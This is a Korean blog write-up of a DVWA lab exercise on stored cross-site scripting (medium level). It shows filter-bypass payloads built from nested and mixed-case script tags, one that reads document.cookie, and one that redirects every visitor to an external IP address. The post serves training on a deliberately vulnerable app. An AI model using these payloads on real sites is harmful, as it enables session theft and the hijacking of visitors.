TeamH4C

[빡공팟 5기] W6 : DVWA 실습 - Stored Cross Site Scripting (medium)

이유갬 2022. 10. 30. 23:25

[ 실습 목표 ]

Redirect everyone to a web page of your choosing.

내가 선택한 웹 페이지로 모든 사람들을 리다이렉트 시키는 것이 실습 목표이다.


[ 실습 화면 ]

- 게시글을 올리는 폼이다.

- 폼의 길이를 늘리고 스크립트 태그를 이용해서 필자의 서버에 리다이렉트 시켜보았다.

- 아마 안될 것이다. low 레벨에서 이런 식으로 리다이렉트 시켰기 때문이다.

- 스크립트 태그만 사라져서 업로드 된 것을 볼 수 있다.

- 스크립트 태그가 필터링 된 것 같은데 소스 코드를 확인해보자.

- 스크립트 태그가 빈 문자열로 치환되는 것을 알 수 있다.

- 이것도 앞선 공격처럼 코드를 작성해보자!

<scrip<script>t>alert(document.cookie);</scrip<script>t>

- 여기서도 그냥 필터링이 되어버린다.

- 다시 소스코드를 봐보니 str_replace 는 Name 부분에서 발생한다.

- Name 부분에 동일한 코드를 삽입해보았다.

- 성공적으로 실행되었다.

<sCriPt>alert(document.cookie);</sCriPt>

- 대소문자를 섞어서 태그를 입력해보았다.

- 성공적으로 작동하는 것을 볼 수 있다.

- 이제 필자의 사이트로 리다이렉트 시켜보자!

<scrip<script>t>location.href="http://117.16.17.186:9879";</scrip<script>t>

- 성공적으로 필자의 사이트로 리다이렉트가 되는 것을 볼 수 있다.